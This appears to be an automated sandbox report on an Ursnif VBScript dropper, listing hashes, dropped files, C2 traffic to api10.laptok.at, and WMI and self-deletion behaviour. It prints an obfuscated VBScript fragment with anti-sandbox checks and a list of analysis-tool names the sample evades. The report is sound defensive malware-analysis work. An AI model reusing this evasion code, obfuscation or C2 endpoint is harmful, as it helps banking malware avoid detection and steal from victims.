Analysis Report 0HsPbXmcFf1k.vbs

ID:	329550
Product:	CloudBasic
Start time:	18:34:42
Start date:	11.12.2020
Sample:	0HsPbXmcFf1k.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	b75cacca388f6233844e2720bc52a9cd
SHA1:	de080d98e0f092175d71f15d78ca92e1665edb53
SHA256:	a5b2a02293e8875977dc822c8b1ca4101c2e378463018a5b6a572be559e3abb4

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F3DA31C8-3C22-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	0AFDAF65EA81AF0A827F00D650C5DBA2	C4A303EB59B9FCF71C192F93BC630154960E217B	AE3B534BAAB4BB90C12F87D614AFBE8CC95ED36F7D574506C5609A0B2BC07FEE
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F3DA31CA-3C22-11EB-90E4-ECF4BB862DED}.dat	Microsoft Word Document	A9DDE7976C9B0CA558798CD4F9E50639	AB934CECEA3D3C69F741043C78D142F98C95500B	59B23A55F1C8BD13827B25A8A5837E8EBA03C3EE0C77364803F29DFE9FA0DF5B
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	56F5EB7A3AF12B4FA3F725427F6F46A6	14B8E5E62A7695A979D36EB91F6E4A0363EB5A8C	9A3FB4676E82595127D8CF426CBAE3332B5C214B26B0E359290DC7677EE37024
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	9161EFFEB55E7A3F431D54C8B4AAD96D	DC09C923029555A4E3C2124193BD22C922481C60	555A05679C10EFFA726251D7B5562DDCB9A61CD7A41E891C6E03D57E2589C8DB
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	BCEF70F9C3999124732DF696B8D3D967	3D39D9FDE599DD2FF259159E115D491BAB676887	5C5E46BD7E4E8BCB453663FB42AA3EF11081DA31F8B50F7566D61F6D026CAEE5
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	452884E31871DB6DEFD6090B91A2338B	1F7AF7CF08F4DBFADBF306C24B3E5F2512028C49	E4EF2808A22708B5748950A70AE711171EA75E8B8170852DBB62A9CD479649DE
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	E21FE5C20A90040624DA8A9801354ABB	046FBFF1EB170378BBFCD7E632D17E2F923A70E3	0A9FE499A7387641DDBBB7337BB679D38231C29350AA6F16309B69EF2DE98F95
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	90B850EECA5829223A60C20A3684A1CB	16807A05E6C378056EE42CEEBC90A5A3204ED67D	03365F5705AAC55A9EDF0EFED207875D6FD357F8DDC8A73679CD7678019F1908
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	E7D98B8AFFAE73E9DA554F68C62958A5	4EC7980569A59DAC3DB1DC818548FD8DA56B44B8	BC25DDA0EA3416BF10F9EF6F2B50177A09E2D562DA34D2F00392147B8AAAFFE0
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A4093653D4D96A4EFB49E68541B6F72B	4524BBCE55C1B0D81F597112A11F5C2321F5E66A	3B4EE4B5A2A2D1F4694F9E5847006DB42DB322896E280759A8F2056EE5FC1BB0
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	2E1F965D9C9DA6F550AE61A7E3B5C7B0	EF66B845260C447E09584E6EE192C59CF6732CBF	4757191E2C90FE2C50B944E77E6636B25D7E66D4C3FF0A047C0219CE2C20776E
C:\Users\user\AppData\Local\Temp\Cretaceous.less	ASCII text, with no line terminators	38BDF376DC8FF06D763ABFB85F16E744	B4418B82A595DBCF6D6C713ED14D7F191D1653D9	FD37C8E5F1BCD00A6A4F72CEC293F75684D4E2F894560C5589FEF0E9D656FC0B
C:\Users\user\AppData\Local\Temp\Florentine.zip	Zip archive data, at least v2.0 to extract	41E4EF92CD8B45BB5B2BBD4BCAE98600	1F5E90A9859F55B1481FE2CEC5B49436E7A612E4	5E4EEBD9A3DF23A450F744DC9B409DC4E4D082913215395053A0B64548DD6152
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	E92D610270954139E1F3C323DA3196FD	D93870FA6338B39F80F7EE20F8C2E6F04A71D597	8D8FA2C1C8D83F8708A6343A501F88E9C0E2E5C440615C6BBE94009B9FC51DDF
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\attrition.rst	ASCII text, with no line terminators	CC6F3311E5E879D311B5A5E112CDD672	89BC5E8A21265FC0630F22F054E6CC5A19E1BBF2	6468EB6A24CA6A63F57A833409BD5D1596DFCC9D63FD7A9B5A145A61209891E4
C:\Users\user\AppData\Local\Temp\excitation.nsv	ASCII text, with no line terminators	08584E25EA1162A8467D6BFEF331815C	E31BD215D6804973362CE94F83BB6C47C1A3ED73	9EF49F09170200FD8F62F1FCF0E91D94D20A191B1FF9552F872D2D53BCB0B6BA
C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	AB221BA951C5ACCC471713110F36D8EA	3A897A9205AF7D3DF4280D988D146523B248B1B4	CEA0B6B83210A878E1BCC0C792658CA341911E8C43FDE86524501D265C8BAE16
C:\Users\user\AppData\Local\Temp\~DF886CDEE6E19D09C0.TMP	data	53123C5E11307C1CE99FFB5D2FA41FFE	4AB3F4513A0E7A14A2ED6B138F9F87A70E2FD9B8	56B8322E81818F04D8C3DFEACB5568E9E8F796C9C83C7860D0FEEE79473F500A
C:\Users\user\AppData\Local\Temp\~DFE07CE41C772562F5.TMP	data	4DA453BEBF66ACB5201E785E4DA53334	5FC4408BD05F07007411844173D933B13A6ACEC2	D8FAA8228F99D4A9B8A50E0B6573857D6C20D52B50222ED318F2417826BF3EAF

AV Detection:

Multi AV Scanner detection for domain / URL

Source: api10.laptok.at	Virustotal: Detection: 12%			Perma Link
Source: http://api10.laptok.at/favicon.ico	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj	Metadefender: Detection: 18%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj	ReversingLabs: Detection: 32%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj

Joe Sandbox ML: detected

Spreading:

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /api1/up8ONzjM/NUlpC0iTl8QPTXkOW4B0HW_/2BJhTzjeJq/8OY5q_2FvwI2aBOZa/blCNrgbOTsXG/HhSGjlZAz75/MGS0M3hXIYptAx/t_2BV8CyK5tAOx9S5ETcL/RfswvYGcruz09Ttu/liLSJkBAsVxHqgz/lU4z93taaS3OdirxC8/XaU5JN3Fl/kDBJId8zKh02ccx1lAnJ/hYXmd9L_2FBIPWbwnnA/RUKF8siFTAyjQU0l65PXXn/uAbc5e9Igb03_/2Bph4va6/5CKxcM_0A_0DG5URWLIjFfc/_2BGXTJPcZ/281nTqW9aBaFUw_2F/4c_2FBISILQC/Ywr7kYPa7W2/Rgd_2BAEKFtO/GAw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive

Found strings which match to known social media urls

Source: msapplication.xml0.26.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xca22f249,0x01d6d02f</date><accdate>0xca22f249,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.26.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xca22f249,0x01d6d02f</date><accdate>0xca2554d3,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.26.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xca27b70e,0x01d6d02f</date><accdate>0xca27b70e,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.26.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xca27b70e,0x01d6d02f</date><accdate>0xca27b70e,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.26.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xca2c7bae,0x01d6d02f</date><accdate>0xca2c7bae,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.26.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xca2c7bae,0x01d6d02f</date><accdate>0xca2c7bae,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Dec 2020 17:37:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Urls found in memory or binary data

Source: {F3DA31CA-3C22-11EB-90E4-ECF4BB862DED}.dat.26.dr	String found in binary or memory: http://api10.laptok.at/api1/up8ONzjM/NUlpC0iTl8QPTXkOW4B0HW_/2BJhTzjeJq/8OY5q_2FvwI2aBOZa/blCNrgbOTs
Source: msapplication.xml.26.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.26.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.26.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.26.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.26.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.26.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.26.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.26.dr	String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj CEA0B6B83210A878E1BCC0C792658CA341911E8C43FDE86524501D265C8BAE16

Java / VBScript file with very long strings (likely obfuscated code)

Source: 0HsPbXmcFf1k.vbs

Initial sample: Strings found which are bigger than 50

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: magnesia.xcodeproj.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winVBS@4/20@1/1

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Creates temporary files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0HsPbXmcFf1k.vbs'

Queries process information (via WMI, Win32_Process)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0HsPbXmcFf1k.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1948 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1948 CREDAT:17410 /prefetch:2			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: c:\personthought\Voicehave\WhetherSeem\SpendGame\ThoughtHer\bit.pdb0B source: wscript.exe, 00000000.00000003.234550233.00000205400E6000.00000004.00000001.sdmp, magnesia.xcodeproj.0.dr
Source:	Binary string: c:\personthought\Voicehave\WhetherSeem\SpendGame\ThoughtHer\bit.pdb source: wscript.exe, 00000000.00000003.234550233.00000205400E6000.00000004.00000001.sdmp, magnesia.xcodeproj.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.ScriptName, cStr(649374277)) > 0 And KPEkhN = 0) ThenExit FunctionEnd If' harbinger gigging supervene patient pink ingest Levitt Shari Manhattan sawmill elucidate171 cereus catastrophe Carolingian597 imbalance Scott avionic augment Daley proboscis Singapore mycobacteria completion listen. pamper nutrition Agee ripple stockbroker repelling appraise tube solicitous pragmatic heartland Rochester Goodwin. agone Gascony umpire megohm punk leatherwork thrifty ambiguity henceforth TV flounce clairvoyant astronomer hall icicle casework rainstorm salesman accordion. rabbinical. chive extraordinary curlew gauze Set qrkNb = GetObject("winmgmts:\\.\root\cimv2")Set PMWjUlItems = qrkNb.ExecQuery("Select * from Win32_Processor", , (182 - ((69 - 4.0) + (30 + 39.0))))' trackage posable council desire straightaway Nikko geophysics anthem beater, Dada heat jettison backstage brant screed fetus, sough gesture uremia, 1631324 woody mitre guild toponymy dusky345 alphabetic Pegasus Skippy. Rawlinson moss stripe parse Jed halma. cane. 8911536 silicic Goff pitman torr angel backfill gar46 billet, 9998939 sausage. postpone bistate nightfall inane smooth civilian, 9785974 constraint haplology Mekong knead decontrolled nimble dynamite ignore consultation equipoise For Each ZhxjBO In PMWjUlItemsREM raunchy monic raucous phosphorescent, faint Patsy inviolable floruit gs Edward honorarium epiphysis. katydid brighten abc pyrotechnic audacious counterproposal analyst doeuvre Burnside jerry Ito181 exotica. 3356268 pewter416 architectural fascicle346 swivel import cherubim807 pulley fluid soignee Barnum. strengthen storefront580 during theory rheostat Borealis Wesleyan Bologna Vernon alpaca t profile accelerate switchman buckhorn facetious eyelet mercer629 stumpy Columbus documentation collector chemistry reduce Moser bail behold buttonhole neuritis Topeka deerstalker mantis auntie Vreeland earnest. 7086757 REM copulate quirk613 armature eminent Hermite striate, horizon Permian expiration lotus concubine sagacious. erg Byzantine seek Broadway bossy, kittenish vagrant, 4130644 Tantric Gilead Harmon whatre Goldstein Heuser wardrobe giddy plague Hertzog marksmen Dahl bowmen deconvolution cessation clitoris impel dubious haggard stifle possessive, hectic peek postorder march emphases Stevenson, If ZhxjBO.NumberOfCores < ((56 + (-40.0)) + (-(1305 - (96 + 1196.0)))) ThenIVyhS = TrueEnd IfNextIf IVyhS ThenJyWHJqREM confess casino veterinary hydroxy chartreuse buzzy subsume. Darwin buteo Nazism flourish sorrel Agatha32 whereon supervisory266 seasonal firecracker diode Lauderdale psychophysic suffer jowl, Lisa sclerotic militia grantee mambo contrition Pennsylvania wysiwyg progenitor Montgomery Natchez witness TOEFL orthorhombic fate anticipatory poignant trot inflammatory bulbous sawyer sequin mutagen complimentary thymus tie. swag horseback counterclockwise headdress puffball suntanning End IfEnd FunctionFunction Kelley()If (InStr(WScript.ScriptName, "TESTING") > 0) ThenEx

PE file contains an invalid checksum

Source: magnesia.xcodeproj.0.dr

Static PE information: real checksum: 0x37c70 should be: 0x37c79

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\0hspbxmcff1k.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXEX
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: FAKEHTTPSERVER.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: SANDBOXIERPCSS.EXE:@V5
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXEP
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
